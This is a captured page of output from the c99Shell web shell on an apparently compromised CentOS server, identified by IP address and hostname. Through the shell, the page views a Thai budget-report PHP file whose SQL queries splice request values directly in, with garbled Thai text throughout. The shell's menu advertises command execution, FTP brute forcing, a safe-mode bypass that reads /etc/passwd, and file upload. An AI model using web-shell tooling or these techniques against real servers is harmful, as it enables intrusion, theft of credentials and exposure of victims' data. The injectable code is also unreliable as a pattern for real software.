110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/Plan_new/ drwxr-xr-x Free 52.62 GB of 127.8 GB (41.18%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/Plan_new/ drwxr-xr-x
Free 52.62 GB of 127.8 GB (41.18%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: indicatorReportPlan.php (17.88 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

";
		echo "

ЎГШіТ·УЎТГ Login ЎиН№
";
		echo "";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../includes/Function.php" );
	
		/**  Create Database Object  */
		$dbObj = new DBConn;

		//=== SESSION
		$Username = $valid_user; 
	

		
		/**  Config Table for This Page  */
		
		$myTable ="project_type_tb";
		$myTable1 = "project_tb";
		$myTable2 = "project_mission"; 
		$myTablePK = "missId";
		//$myTable2 = "money_source_tb";
		$myTablePK2 = "MoneyS_C";
        $myTable3 = "faculty_tb";
		
		//===  projectstdplan_tb //
		$query = " SELECT *  FROM $myTable3   WHERE  Faculty_code='$Faculty_code'     ";
		$result1 = $dbObj->execQuery($query);
		$rs1 = $dbObj->fetchArray($result1);
		
		$startDate1 = ($Budget_Year - 1)."-10-01";
		$endDate1 = ($Budget_Year - 1)."-12-31";
		
		$startDate2 = ($Budget_Year )."-01-01";
		$endDate2 = ($Budget_Year )."-03-31";
		
		$startDate3 = ($Budget_Year )."-04-01";
		$endDate3 = ($Budget_Year )."-06-30";
		
		$startDate4 = ($Budget_Year )."-07-01";
		$endDate4 = ($Budget_Year )."-09-30";
		/**  Paging */
		$page = $_GET['page'];
		if( $page == "" ) { $page = 1; }
		
		/**  ЁУ№З№ўйНБЩЕ µиН 1 Л№йТ  */
		$perpage = $_REQUEST['perpage'];
		if( $perpage == "" ) { $perpage = 30; }

		
	} # else
 ?>







бј№ЎТГґУа№Ф№§Т№ : ГТВ§Т№»ГРаА·µиТ§ж - КГШ»ВНґа§Ф№·ХиўНгЄйµТБбј№







  
    
      execQuery($query);
		$rs = $dbObj->fetchArray($result);
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		if( isset($_GET['OrderBy']) ) {
			$query = " SELECT *  FROM $myTable2  WHERE Budget_Year='$Budget_Year'    
							   ORDER BY  $OrderBy  $ASCDESC ";
		} 
		elseif( !isset($_GET['OrderBy']) ) {
			$query = " SELECT *  FROM $myTable2  WHERE Budget_Year='$Budget_Year'    
							   ORDER BY  $myTablePK  ASC ";
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
    ?>
      
        
          
            
              
                  
                    Л№йТЛЕСЎ » ГТВ§Т№·СиЗд» » ГТВ§Т№бКґ§К¶Т№РЎТГгЄйа§Ф№µТБѕС№ёЎФЁ »Х§є»ГРБТі 
                    
                    
                  
                  
                     ‹ ВйН№ЎЕСє
                  
                  
                    ·Сй§ЛБґ:  ГТВЎТГ
                    Ки§ННЎўйНБЩЕ › 
                  
              
            
            
               
            
            
              
                
                   0 ) { ?>
                fetchArray($result) ) { 
				
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";			
				
          ?>
                  fetchArray($result3) ) { 
			*/	
					$query3 = " SELECT *  FROM project_type_tb   WHERE  subId = '".$rs2['subId']."'  and  Faculty_code='$Faculty_code'  ";
					$result3 = mysql_query($query3);
					while($rs = mysql_fetch_array($result3)){
					
					$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";			
				
				
          ?>
                  
                  
                    ГТВЕРаНХВґв¤Г§ЎТГ
                    бј№ЎТГўНгЄйЁиТВ
                    бј№ЎТГ 
ўНгЄйЁиТВ
                    бј№ЎТГЁиТВЁГФ§
                    бј№ЎТГ
ЁиТВЁГФ§
                    §є»ГРБТі 
 ¤§аЛЕЧН
                    ГйНВЕРўН§
ЎТГаєФЎЁиТВ
                    јЕКСБДФ·ёФм
                  
                  
                    дµГБТК 1
                    дµГБТК 2
                    дµГБТК 3
                    дµГБТК4
                    дµГБТК 1
                    дµГБТК 2
                    дµГБТК 3
                    дµГБТК 4
                  
                  
                    
                      
                    
                  
                   
                  
                    .
                     
                    
                  
                 
                    &Faculty_code=&Budget_Year=','RepPlaning','800','500','yes')">
                      
                      
                     
                                
                    
                                
                    
                    =  '$startDate1' AND Date <=  '$endDate1' ";
				$result10 = mysql_query($sql10);
				$rss10 = mysql_fetch_array($result10);
					echo number_format($rss10['SumB2'],2,'.',',');
            ?>
                    =  '$startDate2' AND Date <=  '$endDate2' ";
				$result10 = mysql_query($sql10);
				$rss10 = mysql_fetch_array($result10);
					echo number_format($rss10['SumB2'],2,'.',',');
            ?>
                    =  '$startDate3' AND Date <=  '$endDate3' ";
				$result10 = mysql_query($sql10);
				$rss10 = mysql_fetch_array($result10);
					echo number_format($rss10['SumB2'],2,'.',',');
            ?>
                    =  '$startDate4' AND Date <=  '$endDate4' ";
				$result10 = mysql_query($sql10);
				$rss10 = mysql_fetch_array($result10);
					echo number_format($rss10['SumB2'],2,'.',',');
            ?>
                    
                    
                    
                    
                    
%
                     
                  
                  
				  
                  
                
              
            
            
               
        
    
  




freeresult($result1);
	
	/**  Close the Database  */
	$dbObj->disconn();
	
	/**  Unset Class  */
	unset($dbObj);
?>
bool(false)

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]--